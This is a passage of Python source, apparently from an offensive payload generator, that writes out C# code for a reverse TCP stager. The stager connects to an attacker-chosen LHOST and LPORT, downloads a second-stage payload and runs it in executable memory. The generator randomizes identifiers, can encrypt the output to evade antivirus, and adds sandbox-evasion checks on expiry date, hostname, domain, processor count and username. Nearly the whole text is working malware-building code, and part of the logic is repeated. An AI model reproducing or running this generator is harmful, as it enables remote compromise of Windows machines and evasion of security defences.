total_bytesName, lengthName, total_bytesName)
payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
handleName, sockName)
payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
handleName, sName, sName)
payload_code += " return %s;}\n" % (sName)
sName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
sName, funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (
hThreadName)
payload_code += " UInt32 %s = 0;\n" % (threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
hThreadName)
sName = helpers.randomString()
curlyCount = 0
payload_code += "static void Main(){\n"
payload_code2, curlyCount = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
sName, sName, getDataName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
payload_code += " %s(%s); }\n" % (injectName, sName)
while (curlyCount != 0):
payload_code += '\t' * curlyCount + '}'
curlyCount -= 1
# get 12 random variables for the API imports
r = [helpers.randomString() for x in range(12)]
y = [helpers.randomString() for x in range(17)]
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
getDataName = helpers.randomString()
injectName = helpers.randomString()
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
payload_code += "namespace %s { class %s {\n" % (
helpers.randomString(), helpers.randomString())
hostName = helpers.randomString()
portName = helpers.randomString()
ipName = helpers.randomString()
sockName = helpers.randomString()
length_rawName = helpers.randomString()
lengthName = helpers.randomString()
sName = helpers.randomString()
total_bytesName = helpers.randomString()
handleName = helpers.randomString()
payload_code += "static byte[] %s(string %s, int %s) {\n" % (
getDataName, hostName, portName)
payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
ipName, hostName, portName)
payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
sockName)
payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName)
payload_code += " catch { return null;}\n"
payload_code += " byte[] %s = new byte[4];\n" % (length_rawName)
payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName,
length_rawName)
payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % (
lengthName, length_rawName)
payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName,
lengthName)
payload_code += " int %s = 0;\n" % (total_bytesName)
payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName)
payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
total_bytesName, sockName, sName, total_bytesName, lengthName,
total_bytesName, lengthName, total_bytesName)
payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
handleName, sockName)
payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
handleName, sName, sName)
payload_code += " return %s;}\n" % (sName)
sName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
sName, funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (
hThreadName)
payload_code += " UInt32 %s = 0;\n" % (threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
hThreadName)
sName = helpers.randomString()
randomName = helpers.randomString()
curlyCount = 0
payload_code += "static void Main(){\n"
if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Create Payload code
payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format(
RandToday)
payload_code += '\t' * curlyCount + 'DateTime {} = {}.AddDays({});\n'.format(
RandExpire, RandToday,
self.required_options["EXPIRE_PAYLOAD"][0])
payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format(
RandExpire, RandToday)
# Add a tab for this check
curlyCount += 1
if self.required_options["HOSTNAME"][0].lower() != "x":
payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(
self.required_options["HOSTNAME"][0].lower())
# Add a tab for this check
curlyCount += 1
if self.required_options["DOMAIN"][0].lower() != "x":
payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n'
# Add a tab for this check
curlyCount += 1
if self.required_options["PROCESSORS"][0].lower() != "x":
payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(
self.required_options["PROCESSORS"][0])
# Add a tab for this check
curlyCount += 1
if self.required_options["USERNAME"][0].lower() != "x":
rand_user_name = helpers.randomString()
rand_char_name = helpers.randomString()
payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(
rand_user_name)
payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format(
rand_char_name, rand_user_name)
payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format(
rand_char_name, self.required_options["USERNAME"][0])
# Add a tab for this check
curlyCount += 1
payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
sName, sName, getDataName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
payload_code += " %s(%s); }\n" % (injectName, sName)
while (curlyCount != 0):
payload_code += '\t' * curlyCount + '}'
curlyCount -= 1
# get 12 random variables for the API imports
r = [helpers.randomString() for x in range(12)]
y = [helpers.randomString() for x in range(17)]
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
